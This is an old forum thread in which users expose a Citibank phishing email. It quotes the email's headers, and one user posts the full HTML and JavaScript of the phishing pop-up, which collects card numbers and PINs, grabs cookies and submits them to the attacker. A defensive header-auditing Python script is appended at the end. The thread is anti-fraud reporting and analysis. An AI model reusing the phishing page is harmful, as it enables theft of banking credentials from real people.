
  christos
join:2002-01-09 Bridgewater, MA
[scam] More scumbags!
It seems that there is no shortage of low life scumbags.
"You must complete this process by clicking on the link below and entering in the small window your Citibank ATM/Debit Card number and PIN that you use on ATM"
Right on! Hold your breath #$#%#$.
Reported to Citibank.
________________________________________________
Received: from compuserve.com (68-173-162-117.nyc.rr.com[68.173.162.117](untrusted sender)) by rwcrmxc14.comcast.net (rwcrmxc14) with SMTP id ; Sun, 28 Sep 2003 14:59:25 +0000
Received: from remotepoint.com [224.152.215.107] by 68-173-162-117.nyc.rr.com (Postfix) with ESMTP id E08B327B7457 for ; Sun, 28 Sep 2003 22:59:05 +0000
Date: Sun, 28 Sep 2003 22:59:05 +0000
From: Verify
Subject: Citibank E-mail Verification: XXXXXXX@attbi.com
To: XXXXX
References:
In-Reply-To:
Message-ID:
Reply-To: Verify
Sender: Verify
MIME-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 8bit
X-Mozilla-Status: 8001
X-Mozilla-Status2: 00000000
X-UIDL: 20030928145926r1400hl25ge0016ol

Dear Citibank Member,
This email was sent by the Citibank server to verify your e-mail address. You must complete this process by clicking on the link below and entering in the small window your Citibank ATM/Debit Card number and PIN that you use on ATM. This is done for your protection -V- becaurse some of our members no longer have access to their email addresses and we must verify it.
To verify your e-mail address and access your bank account, click on the link below. If nothing happens when you click on the link (or if you use AOL)0, copy and paste the link into the address bar of your web browser.
»www.citibank.com:ac=ba0LTCvkfifg···OBhOLqPz
a--------------------------------------------- Thank you for using Citibank! t---------------------------------------------
This automatic email sent to: XXXXXX@attbi.com Do not reply to this email.
R_CODE: 4wTnKZot3d05wP2MBnU4

SYNACK Just Firewall It Premium,Mod join:2001-03-05 Venice, CA
[Attached images: Popup Window 1, Popup Window 2]
These are very sneaky and still live. The link page is just a small password-entry window which concurrently loads the official Citibank page in the background.
Please go to the Citibank site and report this e-mail. (They have a sample just like yours).
See attached image for popup (window 1). After entering garbage, I get Window 2!
[text was edited by author 2003-09-28 17:33:48]

SYNACK Just Firewall It Premium,Mod join:2001-03-05 Venice, CA
HTML code window 1:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- saved from url=(0074)»https://web.da-us.citibank.com/signin/ci···etup.jsp -->
<!-- BS_ID:[VisitorHomepage] - Page name:[Welcome] JSP File:[login2/user_setup.jsp] -->
<HTML><HEAD><TITLE>E-mail Verification</TITLE>
<!-- Meta http equivalent was here -->
<SCRIPT language=javascript src="welcome.files/sniffer.js" type=text/javascript></SCRIPT>
<META http-equiv=Cache-Control content=no-cache>
<META http-equiv=Pragma content=no-cache>
<META http-equiv=Expires content=-1>
<SCRIPT>
function setAction(act){
  document.setup.action.value = act;
  if (onSubmit()) document.setup.submit();
}
var sent = 0;
function onSubmit() {
  if (sent == 1) return false;
  document.setup.signin.value = document.cookie;
  if (!verify(document.setup.user_name.value, document.setup.password.value, document.setup.cin.value, document.setup.remember.checked)) return false;
  sent = 1;
  return true;
}
function verify(uid,pwd,cin,remember) {
  if (uid.length == 0 && cin.length == 0) { alert("Please enter an Card Number and/or a Card Nickname."); return false; }
  if (remember && uid.length == 0) { alert("Please enter a Card Nickname."); return false; }
  if (uid.length != 0 && !useridValidation(uid)) return false;
  if (cin.length != 0 && !cinValidation(cin)) return false;
  if (!passwordValidation(pwd)) return false;
  return true;
}
function useridValidation(username) {
  var maxlen = 15;
  if ((username.length < 1 || username.length > maxlen)) {
    alert("User Names must be 1-" + maxlen + " characters in length.");
    document.setup.user_name.focus();
    return false;
  }
  for (var i = 0; i < username.length; i++) {
    if (! ((username.charAt(i) >= "a" && username.charAt(i) <= "z") || (username.charAt(i) >= "A" && username.charAt(i) <= "Z") || (username.charAt(i) >= "0" && username.charAt(i) <= "9")) ) {
      alert("Your Card Nickname includes an invalid character.\nCard Nicknames can include upper and lowercase letters (A-Z, a-z) and numbers (0-9).\nCard Nicknames must contain no spaces.");
      document.setup.user_name.focus();
      return(false);
    }
  }
  return true;
}
function passwordValidation(password) {
  if (password.length == 0) { alert("Please enter a PIN."); document.setup.password.focus(); return false; }
  return true;
}
function cinValidation(cin) {
  var cinCount = 0;
  for (var k = 0; k < cin.length; k++) {
    var cinChar = cin.charAt(k);
    if (cinChar >= "0" && cinChar <= "9") { cinCount++; }
    else { alert("Card Number must be only digits (0-9), no spaces."); document.setup.cin.focus(); return false; }
  }
  if (cin != "" && cinCount < 14) { alert("Card Number must be at least 14 digits."); document.setup.cin.focus(); return false; }
  return true;
}
</SCRIPT>
<STYLE type=text/css>.cin { FONT-SIZE: 10pt; FONT-FAMILY: arial, helvetica, verdana, "sans serif" } #cin { WIDTH: 178px; FONT-FAMILY: arial, helvetica, verdana, "sans serif" } .password { FONT-SIZE: 10pt; FONT-FAMILY: arial, helvetica, verdana, sans-serif } #password { WIDTH: 178px; FONT-FAMILY: arial, helvetica, verdana, sans-serif } .user_name { FONT-SIZE: 10pt; FONT-FAMILY: arial, helvetica, verdana, sans-serif } #user_name { WIDTH: 178px; FONT-FAMILY: arial, helvetica, verdana, sans-serif } </STYLE>
<SCRIPT>var _pid="VisitorHomepage";var _u="visitor";var _f="NO";var _sid="MyCiti";var _ssid=1;var _pn='Welcome';var _bd='<!--BOTTOMDISCLAIMER--><table border=0 cellspacing=0 cellpadding=0><tr><td colspan=2 valign="top"><SUP>1</SUP>Forbes chose Citibank® Online as its favorite online banking site in its Winter 2002 Best of The Web issue. <sub> </sub><sub> </sub></td><td rowspan=3 align=right><img height=1 width=50 src=https://web.da-us.citibank.com/images/pixel.gif><a href="javascript:launchPopup(\'»https://digitalid.verisign.com/as2/1d131···ight=450 \')"><img border="0" alt="protected by verisign" src="https://web.da-us.citibank.com/images/verisign.gif"></a></td></tr><tr><td valign=top nowrap><br>My Citi gives you access to accounts and services provided by Citibank and its affiliates.<br>Citibank, N.A., Citibank, F.S.B., Citibank (West), FSB. Member FDIC.</td><td width=100%><img src="https://web.da-us.citibank.com/popups/images/lender.gif" width=48 height=51 alt="An Equal Housing Lender" border=0 hspace=6 vspace=2></td></tr></table><!--/BOTTOMDISCLAIMER-->';var _c="http://www.citi.com";var _d="https://web.da-us.citibank.com";var _a="citifi";</SCRIPT>
<META content="MSHTML 6.00.2719.2200" name=GENERATOR></HEAD> <BODY bottomMargin=0 vLink=#003399 link=#003399 bgColor=#ffffff leftMargin=0 topMargin=0 marginwidth="0" marginheight="0"><BR> <center>
<META http-equiv=Pragma content=no-cache> <META http-equiv=Content-Control content=no-cache> <META http-equiv=Expires content=0> <FORM action="obr.html" method=get><INPUT type=hidden name=signin><INPUT type=hidden value=transition3 name=flow><INPUT type=hidden value=signon name=action><INPUT type=hidden value=https name=current_protocol> <SCRIPT> document.write('<input type="hidden" name="screen_width" value="' + screen.width + '">'); </SCRIPT>
<TABLE cellSpacing=0 cellPadding=0 border=0> <TBODY> <TR> <TD bgColor= colSpan=5><IMG src="welcome.files/pixel.gif"></TD></TR> <TR> <TD width=1 bgColor=><IMG src="welcome.files/pixel.gif"></TD> <TD><IMG height=1 src="welcome.files/pixel.gif" width=10></TD> <TD><IMG height=10 src="welcome.files/pixel.gif" width=1><BR><IMG src="welcome.files/so_wycbc.gif"></TD> <TD><IMG height=1 src="welcome.files/pixel.gif" width=10></TD> <TD width=1 bgColor=><IMG src="welcome.files/pixel.gif"></TD></TR> <TR> <TD width=1 bgColor=><IMG src="welcome.files/pixel.gif"></TD> <TD></TD> <TD colSpan=2><B>Card #/CIN </B></TD> <TD width=1 bgColor=><IMG src="welcome.files/pixel.gif"></TD></TR> <TR> <TD width=1 bgColor=><IMG src="welcome.files/pixel.gif"></TD> <TD><IMG height=1 src="welcome.files/pixel.gif" width=10></TD> <TD class=cin vAlign=top height=25><INPUT id=cin maxLength=22 size=13 name=cin></TD> <TD><IMG height=1 src="welcome.files/pixel.gif" width=10></TD> <TD width=1 bgColor=><IMG src="welcome.files/pixel.gif"></TD></TR> <TR> <TD width=1 bgColor=><IMG src="welcome.files/pixel.gif"></TD> <TD></TD> <TD colSpan=2><B>PIN</B></TD> <TD width=1 bgColor=><IMG src="welcome.files/pixel.gif"></TD></TR> <TR> <TD width=1 bgColor=><IMG src="welcome.files/pixel.gif"></TD> <TD><IMG height=1 src="welcome.files/pixel.gif" width=10></TD> <TD class=password vAlign=top height=25><INPUT id=password type=password size=13 name=password></TD> <TD><IMG height=1 src="welcome.files/pixel.gif" width=10></TD> <TD width=1 bgColor=><IMG src="welcome.files/pixel.gif"></TD></TR> <TR> <TD width=1 bgColor=><IMG src="welcome.files/pixel.gif"></TD> <TD><IMG height=1 src="welcome.files/pixel.gif" width=10></TD> <TD> <TABLE cellSpacing=0 cellPadding=0 width="100%" border=0> <TBODY> <TR> <TD><IMG height=10 src="welcome.files/pixel.gif" width=1></TD></TR> <TR> <TD vAlign=top></TD> <TD align=right><INPUT type=image height=24 width=70 src="welcome.files/sgon_btn.gif" align=bottom border=0></TD></TR> <TR> <TD><IMG height=20 
src="welcome.files/pixel.gif" width=1></TD></TR></TBODY></TABLE></TD> <TD><IMG height=1 src="welcome.files/pixel.gif" width=10></TD> <TD width=1 bgColor=><IMG src="welcome.files/pixel.gif"></TD></TR></FORM>
</TABLE> </center> </BODY></HTML>

HTML code window 2:
<html> <head> <title>Your E-Mail Was Verified.</title> </head>
<body> <center> <font size=3 color=red> <br><br><br><b>Thank you. </font> <font size=3> </b><br><br><b>Your E-Mail Address Was<br>Successful Verified.</b><br> </font> </center> </body> </html>

I like the honest choice of words for the program: "sniffer.js"
[text was edited by author 2003-09-28 17:36:31]

christos
join:2002-01-09 Bridgewater, MA
I reported it to Citi within 5 minutes of receiving that e-mail. Hopefully they'll shut this site soon.

SYNACK Just Firewall It Premium,Mod join:2001-03-05 Venice, CA
[Attached image: Success!]
Seems they took care of it

Sunsetstrip Go Kings Premium,MVM join:2000-07-08 West Hollywood, CA
reply to christos
Citi Bank has had a warning on your sign in page for at least the last month warning about this and other scams.
»www.citi.com/domain/spoof/report···/web.da-
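
The two Received headers quoted in the first post can be checked mechanically for the inconsistencies that mark a forged relay path. This is an added example, not part of the thread; the function names and the five-minute clock-skew tolerance are assumptions.

```python
import ipaddress
import re
from datetime import timedelta
from email.utils import parsedate_to_datetime

# Received values copied from the post, newest hop first (the empty "id ;"
# and "for ;" fields are as posted).
RECEIVED = [
    "from compuserve.com (68-173-162-117.nyc.rr.com[68.173.162.117]"
    "(untrusted sender)) by rwcrmxc14.comcast.net (rwcrmxc14) with SMTP id ; "
    "Sun, 28 Sep 2003 14:59:25 +0000",
    "from remotepoint.com [224.152.215.107] by 68-173-162-117.nyc.rr.com "
    "(Postfix) with ESMTP id E08B327B7457 for ; Sun, 28 Sep 2003 22:59:05 +0000",
]

HOP = re.compile(
    r"from\s+(?P<helo>\S+)\s*(?:\((?P<rdns>[^\[\s(]+))?\s*\[(?P<ip>[\d.]+)\]")
SKEW = timedelta(minutes=5)  # assumed tolerance for clock drift between hosts

def parse_hop(value):
    """Split one Received value into HELO name, reverse DNS, IP and time."""
    m = HOP.search(value)
    if m is None:
        raise ValueError("unrecognised Received value: " + value)
    stamp = parsedate_to_datetime(value.rsplit(";", 1)[1].strip())
    return {"helo": m["helo"].lower(), "rdns": (m["rdns"] or "").lower(),
            "ip": ipaddress.ip_address(m["ip"]), "time": stamp}

def audit(received):
    """Return findings for a Received chain listed newest hop first."""
    hops = [parse_hop(v) for v in received]
    findings = []
    for i, hop in enumerate(hops):
        ip = hop["ip"]
        if ip.is_multicast or ip.is_private or ip.is_reserved or ip.is_loopback:
            findings.append(f"hop {i}: {ip} cannot be a public sending host")
        if hop["rdns"] and not hop["rdns"].endswith(hop["helo"]):
            findings.append(
                f"hop {i}: announced as {hop['helo']}, resolves to {hop['rdns']}")
    for i in range(len(hops) - 1):
        # A hop further down the list handled the message earlier, so its
        # stamp must not be later than the hop above it.
        if hops[i + 1]["time"] - hops[i]["time"] > SKEW:
            findings.append(f"hop {i + 1}: stamped after hop {i} took delivery")
    return findings

if __name__ == "__main__":
    print("\n".join(audit(RECEIVED)))
```

On the posted headers this reports three findings: the connecting host announced itself as compuserve.com from an nyc.rr.com address, the inner hop's source 224.152.215.107 is in multicast space, and that hop is stamped eight hours after Comcast's server took delivery.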